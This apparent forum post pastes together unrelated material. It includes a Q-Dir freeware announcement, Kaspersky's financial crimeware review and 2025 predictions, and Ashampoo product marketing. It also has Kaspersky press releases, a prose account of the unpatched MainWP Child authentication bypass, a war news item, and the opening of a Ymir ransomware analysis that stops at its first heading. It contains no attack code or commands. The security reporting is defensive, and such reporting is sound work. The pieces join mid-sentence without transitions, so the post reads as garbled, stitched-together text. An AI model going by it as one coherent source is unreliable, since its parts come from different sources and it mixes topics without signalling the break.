Posted by: mrtrout - 3 hours ago - Forum: Freeware
- No Replies
https://www.softwareok.com/?Freeware/Q-Dir The Quad-Directory-Explorer makes your files and folders easy to manage, either installed or as a Portable Windows program as an alternative Freeware to Windows File Explorer.
Fast and easy access to your hard disks ergo advanced file management for network folders, USB-sticks, floppy disks and other storage devices Is the most popular tool from the category file management on Software OK!
Important! ► add to trusted application under Windows 10 from 2020, 2021!
Key features in the alternative File-Explorer
◆ File management in 4-window with tabs
◆ Folder size with extra information
◆ Color filter for files and folders
◆ Classic and modern address bar
◆ Directory structure with visible tree branches
◆ Print what you see in Explorer Views
◆ Based on the MS Windows OS File Manager
◆ Full Unicode Support
Other options and specifications
◆ Save folder combinations as favorites
◆ Moving and copying the data via "drag and drop"
◆ Mark selected folders and files
◆ Small program great in file management
◆ improved quad explorer file preview
◆ Multilingual
◆ Low System Resource usage
◆ Freeware
◆ ... and much more https://www.softwareok.com/?Download=Q-Dir
download Q-Dir_Installer.zip <<<<< for Windows 829 K https://www.softwareok.com/?Download=Q-D...taller.zip Q-Dir_Portable.zip <<<<< for Windows 830 K https://www.softwareok.com/?Download=Q-D...rtable.zip Q-Dir 11.89 & PORTABLE Q-Dir 11.89 is 100% CLEAN, which means it does not contain any form of malware, including adware, spyware, viruses, trojans and backdoors. was 100% scanned malware free & clean & safe with Kaspersky Standard
108 views Nov 18, 2024 #theSAS2024 #SecurityAnalystSummit #Kaspersky
Cybersecurity experts, global law enforcement, CERTs, CTF-players and industry leaders gathered in Bali, Indonesia, to spotlight key trends shaping cybersecurity's future.
Wanna get a taste of SAS? Check out our video!
Top investigations, top reports, top jaw-dropping revelations, top fun.
GReAT
Kaspersky’s Global Research and Analysis Team constantly monitors known and emerging cyberthreats directed at the financial industry, with banks and fintech companies being the most targeted. We also closely follow threats that aim to infiltrate a wider range of industries, namely ransomware families that are financially motivated.
These observations, as part of our Kaspersky Security Bulletin, help us devise predictions about how the financial cyberthreat landscape will change over the year. This report outlines notable attack trends we expect to face, to help businesses and individuals protect from them. Let’s first look into our predictions for 2024 to see how they turned out, explore the key events in the financial cyberthreat landscape during the year, and then try to predict the trends for 2025.
How accurate were the 2024 predictions?
Increase in AI-powered cyberattacks
✅ True
The prediction that anticipated an upsurge in cyberattacks leveraging machine learning tools turned out to be true. In 2024, we saw cyberattacks boosted by AI emerge not only through emails, manipulated ads, phishing attacks (approximately 21% of phishing emails are now generated by AI) and other content, but also as an effective way to bypass biometric authentication. Machine learning tools allowed criminals to open new accounts using leaked data, impersonating the victims and bypassing security mechanisms used in the KYC (know-your-customer) process, manipulating and changing faces, videos, pictures, etc. Threat actors like Gringo 171 specialized in developing these tools, selling them to any criminal interested in bypassing biometrics authentication. As an example, in one recent case, Brazilian Federal Police arrested criminals who were using AI-powered tools to open bank accounts for money laundering. They opened thousands of accounts, creating fake faces and easily bypassing biometric checking.
Fraudulent schemes targeting direct payment systems
✅ True
The prediction that cybercriminals would exploit direct payment systems like PIX, FedNow and UPI through clippers and mobile banking Trojans was confirmed. We saw the appearance of GoPIX, a banking Trojan in Brazil targeting the PIX real-time payment system and implementing clipboard monitoring as a way of changing keys and stealing payments. The same technique was used in a Trojan targeting Android devices. Other banking Trojan families already implemented cryptocurrency stealing functionality by targeting the sites directly, or intercepting user clipboard.
While there haven’t been any major publicly reported fraud cases directly tied to the FedNow system as of October 2024, concerns about the potential for fraud remain high. FedNow, the Federal Reserve’s real-time payment service, allows for instant fund transfers, but its rapid nature can be exploited by fraudsters, especially in the form of authorized push payment (APP) fraud.
Regarding UPI, the national direct payment system of India, scammers spammed UPI IDs with multiple collect requests. It’s easy to crack a UPI ID as it is generally formed with the user’s mobile number followed by the UPI provider name. Scammers can obtain victims’ phone numbers, as they are widely used in public — for online shopping, in malls, restaurants and so on. Users have been getting many fraudulent money collect and autopay requests from Netflix, Google Pay, etc. in their UPI accounts. In some cases, these are authentic UPI autopay requests initiated by fraudsters from their Netflix accounts, making an unsuspecting user essentially pay for the scammer’s subscription.
Finally, we have noticed a rise in fake instant payment apps in Latin America, used to carry out different kinds of scams. In this context, cybercriminal groups are developing apps that convincingly mimic monetary transactions, displaying a fake receipt without any real connection to transactional systems, to trick sellers into engaging in illegal or loss-making transactions. These apps are sold on dark web forums to scammers who use them to make fake purchases on behalf of small businesses.
Global adoption of Automated Transfer Systems (ATS)
☑️ Partially true
The prediction suggested that attacks with mobile ATS will become adopted globally. While mobile banking Trojans using ATS were already a reality, their global adoption is still underway. One of the groups behind the development of a particular malware family using this technique in Brazil was planning to expand their attacks to Europe by launching a test version of the malware. However, before they had a chance to spread out, they were arrested following a Kaspersky notification to the Brazilian police.
Moreover, with Google continuing to restrict even further the Accessibility permission in newer Android versions, we believe it will be harder for malware in general to apply the ATS trick in future mobile banking Trojan developments, as this needs accessibility settings enabled.
Resurgence of the Brazilian banking Trojans
✅ True
The prediction that attacks by the Brazilian banking Trojans would become more extensive, and Grandoreiro would gain momentum was confirmed. The Brazilian banking Trojans arose in 2024 as a global threat, targeting many countries and expanding their reach. The most prevalent families in 2024 have been Guildma, Javali, Melcoz, Grandoreiro (the Tetrade group). Other families are Banbra, BestaFera, Bizarro, ChePro, Casbaneiro, Ponteiro, and Coyote. Grandoreiro expanded to target more than 1700 banks in 45 countries, on every continent, and even the arrest of several gang members didn’t stop them. In the top 30 banking Trojan families we detected worldwide, 11 are of Brazilian origin and account for 22% of all detections on our users in 2024 (according to the KSN statistics gathered from January to October 2024).
Ransomware target selection
✅ True
The prediction suggested that ransomware groups would turn to more targeted, highly selective attacks. In 2024, ransomware groups have intensified their focus on high-value targets, with larger organizations, particularly those whose revenue exceeds $5 billion, continuing to be the primary marks due to a likelihood of extracting higher ransoms from these. This trend aligns with a shift toward targeting of financial services and especially banking institutions, there being a marked increase in attacks. Banks alone accounted for 20% of ransomware incidents in this sector. The average ransom demand rose by $400,000 from 2023 to 2024, underscoring attackers’ pursuit of higher payouts. However, while the most skillful ransomware operators have homed in on high-profile sectors, other groups continue to strike broadly, impacting the government, healthcare, and education sectors. This dual approach drove a 21.5% rise in ransomware incidents from Q1 to Q2 2024 and a year-over-year increase of 4.3% in the first half of the year, suggesting that, despite a selective trend, ransomware still remains a widespread threat across industries.
Open-source backdoored packages
✅ True
The prediction anticipated a worrying increase in open-source backdoor packages, which we observed to be true. The XZ Backdoor was a major incident affecting Linux distributions when backdoored packages ended up inside popular OSS. We did an extensive analysis of this backdoor here, here and here. Unfortunately, it wasn’t the only one, as we saw many other similar incidents this year.
Decrease in 0-days, increase in 1-day exploits
❌ False
The prediction that crimeware actors would shift from zero-day to first-day exploits has proven inaccurate for 2024, as recent trends indicate a sustained and even heightened reliance on zero-day vulnerabilities. According to CVE.org, it registered 28,961 vulnerabilities in their catalog in 2023, while January through November 2024, the program registered 29,004, the highest number ever recorded.
According to the Rapid7 2024 Attack Intelligence Report, the use of zero-day exploits has surged, with 53% of widely exploited CVEs recently beginning as zero-day attacks — a trend observed in two of the last three years. This focus on zero-days has been reinforced by the sophisticated and orchestrated nature of recent attacks, where 23% of widespread threat CVEs have been attributed to high-value zero-day vulnerabilities. The commercial market for zero-day exploits is also booming, with brokers offering significant payouts, such as up to $2 million for iPhone zero-days. In contrast, there is no evidence pointing to a rise in first-day exploit usage among crimeware actors, underlining that zero-day attacks remain a primary tactic in the cybersecurity threat landscape.
Exploitation of misconfigured devices and services
✅ True
The prediction regarding the exploitation of misconfigured devices and services has proved accurate in 2024, as evidenced by the EMERALDWHALE operation. This global campaign specifically targeted misconfigured Git setups, resulting in the theft of over 15,000 cloud service credentials and unauthorized access to more than 10,000 private repositories. The impact was extensive, compromising various services, including cloud providers and email platforms, which underscores the widespread nature of vulnerabilities relating by misconfiguration. Attackers used private, automated tools to scan, extract, and verify stolen tokens from misconfigured services, significantly expanding their reach and efficiency. This misconfiguration trend also exposed sensitive data stored in configuration files, such as Laravel’s .env files, and highlighted cloud storage vulnerabilities, such as a compromised Amazon S3 bucket containing over a terabyte of sensitive information.
Fluid composition of affiliate groups
✅ True
The prediction suggesting a more fluid distinction between cybercrime groups has proven accurate. In 2024, the ransomware ecosystem has become increasingly dynamic and adaptable, with affiliates adopting a “multi-platform” approach. Many threat actors are now working with multiple ransomware families simultaneously, allowing them to optimize their operations and mitigate risks associated with relying on a single group. For instance, cybersecurity researchers have observed affiliates actively participating in campaigns for different ransomware families, switching between groups like BlackMatter, and newly emerged ones, such as RansomHub. This strategic approach allows them to maintain a constant stream of attacks by leveraging different ransomware strains depending on the target, potential payout, and current operational status of each RaaS platform. The fragmentation of the ransomware landscape is evident, with the number of groups listing victims rising from 43 to 68 and the emergence of 31 new groups in the past year alone. This decentralization complicates law enforcement efforts, as tracking and containing these groups has become more challenging due to their agile structure and international reach. Smaller groups like Medusa and Cloak are capitalizing on this fluid environment, offering attractive profit-sharing on dark web resources to draw affiliates. For example, Medusa is offering up to 90% profit-sharing to attract affiliates, while Cloak allows affiliates to join without any initial payment. Meanwhile, established platforms continue to evolve their offerings to retain and attract skilled operators.
Adoption of less popular / cross-platform languages
✅ True
The prediction anticipated that cybercriminals would turn to lesser-known programming languages to evade detection. Multiple threats have emerged from the adoption of fairly new or non-standard programming languages used for malware development. Tooling like KrustyLoader (a loader implant written in Rust), NKAbuse, or even K4Spreader (a loader used by 8220 Gang and written in Golang) has been caught in the wild. Moreover, we saw Trojan spies, banking Trojans and other financially motivated malware developed in Go. These are a clear signal that malware developers make use of these languages not only because of their practicality and easy portability to different OSs, but also because they make analysis a more strenuous task.
Emergence of hacktivist groups
✅ True
The prediction that saw the rise of hacktivist groups due to global conflicts proved to be true. The hacktivist scene got only bigger and stronger. The presence of new groups in different parts of the world and the increase in surrounding conflicts offer a fertile ground for hacktivism. Currently, groups such as CiberInteligenciaSV, a Salvadoran hacktivist group created in early 2024, can reach up to two or three leaks per day. SiegedSec and GhostSec are two hacktivist groups that are part of an alliance called The Five Families. They continue to attack critical infrastructure, such as ICS/SCADA and GNSS satellite receivers, in various countries, mainly in conflict zones associated with current geopolitical events.
Crimeware predictions for 2025
Upsurge in stealer activity
Victims’ information gathered through stealer attacks will lead to an increase in crime: either cybercrime or traditional crime. Lumma, Vidar, RedLine and others will survive disruptive operations by law enforcement, adapt and adopt new techniques. New players among stealer families will appear.
Attacks against central banks and open banking initiatives
Central banks are responsible for implementing and running instant payment systems, CBDCs (central bank digital currencies), transferring gigabytes of data among financial entities through open banking initiatives, etc. This will make central banks an interesting target for cybercriminals. Open banking systems rely heavily on APIs to allow the sharing of data. APIs can be vulnerable to abuse, where attackers manipulate API endpoints to gain unauthorized access to sensitive data. We expect the number of attacks targeting central banks and open banking APIs to rise significantly over the year.
Increase in supply chain attacks on open-source projects
In the wake of the XZ backdoor incident, the open-source community began to check every commit in OSS projects more thoroughly. This increased vigilance is likely to uncover both new attempts and previously successful backdoors implanted through malicious commits. Furthermore, a high success rate and associated impact increase the popularity of this tactic.
New blockchain-based threats
The ever-growing use of blockchain in new technology and the increasing adoption of cryptocurrency as a means of payment makes blockchain-related threats a fertile field. New protocols emerge with a need for a secure and private network based on blockchain and peer-to-peer communications, which eases the distribution and diverse usage of new malware based on these obscure protocols. This comes tied to the increasing use of modern programming languages like Go and Rust, languages that are chosen by these blockchain-based protocols to develop their SDKs, and we expect the trend of using these languages for malware development to continue.
Expansion of Chinese-speaking crimeware worldwide
We saw several crimeware families of Chinese origin covertly emerge, targeting users outside their common area of attack, Asia, and switching to users in Europe and LATAM, mainly through Android banking Trojans and phishing campaigns that aim to clone credit cards. But we also saw some advanced attacks such as DinodasRAT. We expect an even more noticeable expansion of Chinese crimeware to other countries and markets as it explores new opportunities and increases the frequency of its attacks.
Synthetic data poisoning through ransomware
Ransomware will turn to modifying victims’ data or injecting invalid data into targeted infrastructures, rather than merely encrypting. This “data poisoning” technique will make it more difficult or impossible to recover businesses’ original data assets even after decryption.
Quantum-resistant ransomware
Advanced ransomware groups will start using post-quantum cryptography as quantum computing evolves. The encryption techniques used by this “quantum-proof” ransomware will be made to resist decryption attempts from both classical and quantum computers, making it nearly impossible for victims to decrypt their data without having to pay a ransom.
Weaponization of regulatory compliance by ransomware attackers
Attackers will examine a targeted company’s regulatory responsibilities and purposefully encrypt or alter data in ways that may result in serious compliance violations. The attackers will then add additional financial and legal pressure to the extortion scheme by threatening to alert regulators if their demands are not met.
Ransomware-as-a-service proliferation
The RaaS model will continue to make it easier for cybercriminals to design and execute attacks. Less experienced actors will be able to launch sophisticated attacks with kits as inexpensive as $40, increasing the number of incidents.
More AI and machine learning on the defense side
Today, numerous cybersecurity solutions already leverage artificial intelligence to address common vulnerabilities, such as configuration errors, alert handling and more. In the future, we will see AI increasingly adopted in cyberdefense to accelerate anomaly detection, reduce the duration of analysis through predictive capabilities, automate response, and strengthen policies to counter emerging threats. AI will accelerate detection and bolster defenses against evolving threats. This shift is backed by a significant increase in real-time machine learning applications, which are reshaping cyberdefense by enhancing adaptability and reducing manual workloads. As threat actors also turn to AI, the stakes rise for defenders to evolve equally advanced, adaptive strategies.
Upsurge in financial cyberattacks targeting smartphones
We see that while the number of attacks on PCs using traditional banking or financial malware is decreasing, financial cyberthreats for smartphones are on the rise: the global number of users who encountered mobile financial threats in 2024 increased twofold (by 102%) compared to 2023. We expect this number to grow further, capturing the attention of both malicious actors and potential victims.
https://content.kaspersky-labs.com/se/me...asheet.pdf Kaspersky
Crimeware
Intelligence
Reporting
Evolving threats
The world of crimeware threats is
constantly evolving. Crimeware
refers to malicious programs
specifically designed to commit
financially-motivated cybercrime.
The most infamous example is
ransomware – programs which
block access to data or disrupt a
computer’s performance. There
are no limits to the imagination of
cybercriminals who are coming
up with ever-more sophisticated
ways to gain and monetize their
access to their target’s systems,
accounts and data.
Introduction
Financially-motivated cybercrime is not limited to specific industries.
And while attacks on financial infrastructures like ATMs and PoS
(Point of Sale) devices continue, all enterprises in every sector
are at risk from ransomware. Over the last couple of years, there
has been a blurring of boundaries between different types of
threats and different types of threat actors. This includes the
emergence of advanced persistent threat (APT) campaigns focused
not on cyberespionage, but on theft – stealing money to finance
other activities that the ATP group is involved in. We should not
underestimate the growing sophistication of crimeware threats.
Kaspersky Crimeware Intelligence Reporting enables organizations
to inform their defensive strategies by providing timely information
on malware campaigns, attacks targeting financial institutions and
information on crimeware tools used to attack banks, payment
processing companies and their specific infrastructures.
Detailed descriptions of popular, widespread and
highly-publicized hyped malware
Researcher notes/early warnings, including
information on new and updated malware threats
Information on dangerous, widespread malware
campaigns
Detailed descriptions of threats targeting
financial infrastructures and the corresponding
attack tools being e developed or sold by
cybercriminals on the Dark Web in various Website status:
Windows collects extensive usage data, and browsers track every online activity. Ashampoo Privacy Inspector 2 empowers you to take control of this data. The software provides detailed insights into which objects were used, when, and how often, offering various filters for clear data display. It allows for precise analysis of browsing behavior across all user profiles on a PC, covering everything from visited pages to top search terms and login timestamps. Browsing behavior can be viewed in lists or tree structures, with the option to delete data as needed. Downloads, searches, and logins are transparently displayed and fully filterable across major browsers like Chrome, Firefox, and Edge. Ashampoo Privacy Inspector 2 introduces a new activity module to track key events, along with a DNS cache module that offers detailed connection information and a simple delete function. Internet Cleaner supports the latest browser versions and includes a deletion history, while File Wiper ensures the permanent, secure erasure of sensitive data. Additionally, the software provides enhanced privacy settings for Windows and apps, optimized search term tracking from browsers and Windows Explorer, and improved performance through efficient memory management and multi-core support.
- Activities module reveals all significant events
- DNS Cache module with detailed display and clearing function
- Internet Cleaner with deletion history and support for the latest browser versions
- File Wiper for permanently deleting sensitive data
- Numerous new privacy settings for Windows and apps
- Search term logging for all browser profiles and Windows Explorer
- Optimized performance through memory management and multi-core support
System requirements
Operating System:
Windows 11, Windows 10 (x64)
Supported Browsers:
Mozilla Firefox, Google Chrome, Microsoft Edge Chromium
Requirements
Any device that supports the operating systems listed above.
Other
Screen resolution 1280x768 (Recommended: 1920x1080 )
Full administrative rights are required to use the program. An Internet connection is required to activate the program. The program license is verified repeatedly at regular intervals.
Windows collects data about your usage habits and what you do online. But what exactly is being recorded, and what can you do about it? From detailed evaluations of all PC activities, a look into the DNS cache, to comprehensive security settings–everything is revealed! Ashampoo Privacy Inspector 2 offers fascinating insights into the inner workings of Windows, including activities that are being logged, and returns maximum privacy back to you!
View used objects neatly arranged
Safely delete confidential usage data
Analyze web browsing behavior for all user accounts
Multiple search filters for fast and precise results
Display page visits by time and frequency
Retrace online activities in detail
Delete what other cleaners leave behind
Review and delete download history
Analyze online search behavior and identify top search terms
Keep an eye on logins and form inputs
Erase internet traces and usage logs
Disable telemetry and unwanted data sharing
Safeguard and protect your data and privacy
Limit usage rights for apps
Prevent location tracking, data syncing, and personalized ads
Activities module reveals all significant events
DNS Cache module with detailed display and clearing function
Internet Cleaner with deletion history and support for the latest browser versions
File Wiper for permanently deleting sensitive data
Numerous new privacy settings for Windows and apps
Search term logging for all browser profiles and Windows Explorer
Optimized performance through memory management and multi-core support
Comprehensive PC monitoring with Activities module
The new Activities module provides a comprehensive overview of all significant events on your PC. From running .exe files, opening files and folders, to installing or updating software–nothing escapes your attention! Learn exactly when the system was started or shut down, which user logged in or out, and if and when software errors occurred. Even default system events and background tasks are fully revealed to you. This powerful tool offers a detailed log of all your PC activities!
View and clear DNS cache
Did you know that your computer stores the IP addresses of visited websites in the DNS cache to speed up loading times? This makes browsing faster, but entries can become outdated or be manipulated during an attack (DNS spoofing). With the new DNS Cache Module, you stay in control! Not only can you view the cache in detail but also easily clear it when problems arise. You can even check the similarly structured hosts file. This ensures up-to-date connections and protects you from potential security risks!
Heightened data and OS security
In the Privacy section, you will find numerous new settings to configure Windows, apps, and browsers to be more secure and discreet. Internet Cleaner has been further enhanced: Deleted items now appear in a history, and the latest browser versions are optimally supported. Also new is File Wiper, which allows you to permanently delete sensitive data and folders. Even with specialized software, these files cannot be restored, ensuring your privacy remains intact!
Retrace your steps online
There are times when you need to retrace your most recent activities on the internet. How did you end up on that page and what were you looking for? Ashampoo Privacy Inspector helps you to analyze web sessions with extensive list or tree views that cover all of your online activities. Bring your web browsing history to life and never lose the thread again.
More under-the-hood improvements
Search terms are now logged not only from all browsers and user profiles but also Windows Explorer. You can now access all data across profiles and use handy filters for better organization. Thanks to optimized memory management and new multi-core support, Ashampoo Privacy Inspector 2 works more smoothly than ever before, even during extensive analyses!
Which objects were used, how often were they accessed, and when?
Usage-related information about open files and folders is constantly gathered without your notice. Wouldn't you like to know how much information about your work gets logged by your PC? Ashampoo Privacy Inspector will tell you! Find out exactly what is going on behind the scenes while you're using your computer, use filters to narrow down results, and delete them at your leisure!
How much does your PC know about your web browsing habits? You'll be surprised...
You may be using adblockers, VPNs, and other means to browse the web anonymously, but you'll still leave telltale traces about search terms, form inputs, and visited websites on your PC! Use Ashampoo Privacy Inspector to review not just your traces but those of anyone else using your computer. Apply filters to focus on what's relevant to you, sift through data from Chrome, Edge, and Firefox with ease, and delete anything you don't want recorded!
Download and search history reloaded, literally
Take full control of your download and search history. Online source, file size, download time, with Ashampoo Privacy Inspector, all the information you need is right there at your fingertips–not just for you but for anyone else using your computer! But no worries, built-in filters will help you to identify, and delete, sensitive information in no time. Want to revisit a recent page but forgot how to get to it? Ashampoo Privacy Inspector will help you with that, too!
Logins and browsers
At lot of sites require us to log in with dedicated user names and passwords these days. So where did you leave your credentials today? Exactly what information did you enter into forms and how often have you visited the affected pages? Enjoy 100% transparency and precision with Ashampoo Privacy Inspector today!
More privacy for you
Ashampoo Privacy Inspector comes with everything you need to curb the excessive data collection by Windows. Disable telemetry and location services, turn off password syncing, and shut up Cortana. And, in case you're using a tablet to use your handwriting with Windows, you may want to know that Windows also sends out samples of your handwriting, so make sure to turn that off, too! It only takes a few clicks.
Eliminate web browsing traces
If you like it brief and clear-cut, you'll love the built-in overview. It has all the cached files, cookies, and session-related information you need. Feel free to whitelist important cookies and delete the rest to clear up space!
Recover deleted files
Speaking of deleting data: Have you ever accidentally deleted an important file? Ashampoo Privacy Inspector can recover it for you! Pick a drive, and the program will neatly list all deleted files–along with the ability to recover them individually. It's a lifesaver!
72,862 views Oct 19, 2024 ✪ Members first on October 19, 2024
Best Antivirus vs Unknown Ransomware Part II: In this video we test Kaspersky vs Bitdefender vs ESET vs Malwarebytes. Previous video with Crowdstrike, MS Defender, Sentinel One etc: • Best Antivirus/EDR vs Unknown Ransomware
https://www.kaspersky.com/about/press-re...-in-bogota Kaspersky strengthens trustworthiness commitment with new Transparency Center in Bogotá
November 14, 2024
Kaspersky today announced the opening of its new Transparency Center in Bogotá, Colombia, reinforcing its commitment to trust and transparency in the region. Launched within the framework of Kaspersky’s signature Global Transparency Initiative (GTI), the center will provide visitors with services ranging from an overview of the company’s transparency practices to its source code review, further demonstrating the integrity of Kaspersky’s solutions and practices.
Kaspersky’s GTI highlights its commitment to enhance trust in the company’s solutions and help its partners and customers mitigate supply chain risks with confidence. Launched in 2017, the initiative aims to comprehend the “black box” of cybersecurity technology engaging with stakeholders and the broader community in verifying the trustworthiness of the company’s products, internal processes, and business operations. As part of the GTI development, Kaspersky is the first cybersecurity vendor to open its source code for external review.
The new Transparency Center will work on the premises of Kaspersky’s new office in Bogotá, established in August 2024 with the view to further strengthen the company’s presence in the country and the region. The facility in Bogotá becomes the company’s second center in the region in addition to the one in São Paulo, Brazil, opened in 2019.
Just as at the São Paulo center, visitors of the Bogotá center will be able to choose one of three review options for their visit, depending on the depth of security assessment needed:
· “Blue piste” offers a general overview of the security development processes of Kaspersky products and services, as well as its data management practices;
· “Red piste” allows for a review of the most critical aspects of source code, assisted by the company’s specialists, and provides a targeted analysis of a particular functionality;
· “Black piste” enables visitors to conduct the most comprehensive and thorough source code reviews, with the help of Kaspersky’s experts.
During a Transparency Center visit, guests can also examine the company’s secure software development documentation, which includes threat analysis, secure code review, application security testing processes, and the Software Bill of Materials.
"Kaspersky is proud to strengthen its commitment to transparency and trust for customers, business partners, and local regulators in Bogotá with the launch of the company’s Transparency Center in the country," said Daniela Alvarez de Lugo, General Manager for NOLA at Kaspersky. "Expanding our presence in Colombia reinforces our constant dedication to openness, allowing stakeholders to examine our products, practices and processes, and fostering greater confidence in our cybersecurity solutions."
Leading the cybersecurity industry in transparency efforts, Kaspersky currently employs 150 staff across the Latin American region, including local members of the Global Research and Analysis Team who analyze and counter cybersecurity threats on the continent, further fostering trust through secure infrastructure and transparency-focused services.
In addition to Transparency Centers, since its launch, Kaspersky’s GTI also introduced additional mechanisms to enhance digital trust and promote greater accountability in the cybersecurity field. These include the relocation of cyberthreat-related data storage and processing to Zurich, Switzerland; independent third-party reviews of internal processes and engineering practices, for instance the recently renewed SOC 2 audit; the launch of a security training Cyber Capacity Building Program; increasing bug bounty rewards up to US$100k (for the most critical vulnerabilities found in Kaspersky’s products). It also includes the releasing of Transparency Reports, which consist of two parts, and reveal information on requests received from government and law enforcement agencies, and users for their personal data.
To learn more about Kaspersky’s Global Transparency Initiative or to request a visit to the Transparency Center in Bogotá, please check the website.
About Kaspersky
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. With over a billion devices protected to date from emerging cyberthreats and targeted attacks, Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. We help over 200,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com. Website status:
MainWP, a plugin widely used for managing multiple WordPress sites from a single dashboard, has left a critical security vulnerability unpatched, despite being informed of the issue.
This flaw, present in the MainWP Child plugin used by over 700,000 websites, permits unauthorized attackers to access websites with administrator privileges, potentially compromising sensitive data and user trust.
Authentication bypass problem
The vulnerability, classified as an authentication bypass, exists within the MainWP Child plugin due to an insecure connection setup between the MainWP Child and Dashboard plugins. When linking a MainWP Child site to a central Dashboard, the only required information is the site's URL and the administrator username — no password is necessary. This weak verification process allows attackers to exploit the connection and gain admin access simply by submitting a username, bypassing password checks entirely.
Within the plugin's register_site function, the setup process includes checks for certain parameters, such as user and pubkey. However, if both are supplied, the plugin's login function grants administrative access without enforcing a password requirement. This design flaw leaves sites with unprotected MainWP Child installations vulnerable to unauthorized logins. Notably, sites are only protected if they manually enable the “Require unique security ID” feature, which is off by default, thus leaving many installations exposed.
The flaw has been assigned a CVSS score of 9.2 (Critical) and is tracked as CVE-2024-10783.
Disclosure and response
Security researcher Sean Murphy, who identified the issue, disclosed it to MainWP and to Wordfence's bug bounty program. On November 2, 2024, Wordfence initially validated the report but later ruled the issue out of scope, describing it as a “known feature” rather than a vulnerability. Wordfence explained that this functionality, documented in MainWP's usage guidelines, was intentional and included user warnings. MainWP directly rejected the report on November 11, asserting the design's validity and confirming that the software “works as designed,” thus declining to patch the issue.
Murphy expressed dismay over MainWP's stance, pointing out that this is not the first instance of an authentication bypass vulnerability in the MainWP Child plugin. Similar flaws have been found and patched in the past, raising questions about MainWP's decision not to address this current vulnerability. Murphy argues that MainWP's approach fails to balance usability with necessary security protections.
Implications and security recommendations
MainWP's refusal to patch this vulnerability exposes managed sites to a substantial risk of takeover attacks, especially if left unconnected to a dashboard or if security configurations remain at default settings. The vendor's position underscores a fundamental disagreement over the nature of security risks: whereas many in the cybersecurity field consider insecure design a vulnerability in itself, MainWP and Wordfence's decisions suggest otherwise, emphasizing intention over security outcomes.
MainWP's warning when plugin left at vulnerable state
kernelmode.blog
For WordPress site administrators using MainWP Child, Murphy has recommended alternative security measures, such as enabling the “Require unique security ID” option, which, when configured, provides an additional verification layer. Additionally, security providers can deploy virtual patches on web application firewalls to detect and mitigate potential exploit attempts. Murphy provided a proof-of-concept (PoC) exploit, primarily for security teams, to help them recognize malicious activity targeting this vulnerability.
Website admins are recommended to perform the following actions:
Enable “Require unique security ID” to prevent unauthorized logins.
Use a Web Application Firewall (WAF) to detect and block exploit attempts by analyzing request patterns based on known attack signatures.
Keep all plugins, themes, and WordPress core updated, and assess installed plugins for potential risks, including intentional design flaws that could jeopardize security.
About Alex Lekander
Alex is the founder and Editor-in-Chief of CyberInsider.com. His background and expertise includes digital privacy, security, and tech journalism. When he’s not working behind a screen, Alex is probably tinkering with a boat or enjoying the outdoors. https://opentip.kaspersky.com/https%3A%2...tab=lookup Report
Report for web address https://cyberinsider.com/700000-wordpres...available/
Good
Overview
IPv4 count ≈ 6
Files count 0
Created
26 Jun, 1996
17:00
Expires
25 Jun, 2028
18:00
Domain cyberinsider.com
Registration organization Privacy service provided by Withheld for Privacy ehf
Registrar name NAMECHEAP INC
https://www.kaspersky.com/about/press-re...in-h1-2024 Kaspersky achieves 25% increase in APT detection with machine learning
October 2, 2024
Kaspersky’s Global Research and Analysis Team (GReAT) has recorded a 25% increase in the detection of advanced persistent threats (APTs) during the first half of 2024. By leveraging machine learning techniques in its internal service, GReAT uncovered thousands of new advanced threats targeting government, finance, enterprise, and telecommunications sectors. These findings were achieved by analyzing global cyberthreat data from the Kaspersky Security Network (KSN).
The machine learning models employed in Kaspersky’s solutions use techniques such as Random Forest and term frequency–inverse document frequency (TF-IDF) to process vast amounts of data, enabling faster and more accurate detection of subtle threats. This combination of ML methods allows for the identification of indicators of compromise (IoCs) that traditional detection systems might overlook, leading to more precise anomaly detection and a significant improvement in overall threat detection capabilities.
Kaspersky’s ongoing use of machine learning has allowed its systems to process millions of data points daily, providing real-time insights into emerging threats. This has resulted in a 25% increase in threat detections for the first half of 2024, significantly enhancing the ability to reduce response times and mitigate cyber risks.
“The results have exceeded our expectations,” said Amin Hasbini, Head of the META Research Center at Kaspersky’s GReAT. “These technologies improve detection accuracy and foster proactive defense strategies, helping organizations stay ahead of evolving cyber threats. The future of cybersecurity lies in ethically harnessing these tools to ensure a safer digital environment for all.”
Kaspersky’s machine learning models are regularly refined and updated with new data to maintain their effectiveness in a constantly changing cyberthreat landscape. As new attack vectors emerge, these models are monitored and tuned to provide timely insights, strengthening defenses and enhancing organizational resilience.
The research results will be discussed at GITEX 2024, where Kaspersky will participate in a panel on the impact of AI on cybersecurity. To learn more about machine learning in threat hunting, visit Securelist.com.
About Kaspersky
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. With over a billion devices protected to date from emerging cyberthreats and targeted attacks, Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. We help over 200,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com.
The Russian military has assembled a force of some 50,000 to 100,000 soldiers in preparation for an attack on Ukrainian-occupied Russian territory, in the Kursk region. So reports the New York Times. A lot of North Koreans are part of this force that is to recapture Russian territory.
In recent months, Russia has already systematically recaptured territory it suddenly lost in a Ukrainian surprise attack in August. And now, according to American sources, the Russian military seems all set for a much larger-scale operation to take back all the lost territory. It has assembled 100,000 troops to do so, including reportedly an unknown number of North Korean soldiers. The Russian counteroffensive is said to begin in the coming days, according to Ukrainian sources.
(SR for Tagtik/Source: The New York Times/Illustration: Filip Andrejevic for Unsplash)
Eduardo Ovalle
Introduction
In a recent incident response case, we discovered a new and notable ransomware family in active use by the attackers, which we named “Ymir”. The artifact has interesting features for evading detection, including a large set of operations performed in memory with the help of the malloc, memmove and memcmp function calls.
In the case we analyzed, the attacker was able to gain access to the system via PowerShell remote control commands. After that, they installed multiple tools for malicious actions, such as Process Hacker and Advanced IP Scanner. Eventually, after reducing system security, the adversary ran Ymir to achieve their goals.
In this post, we provide a detailed analysis of the Ymir ransomware, as well the tactics, techniques and procedures (TTPs) employed by the attackers.
Analysis
Static analysis
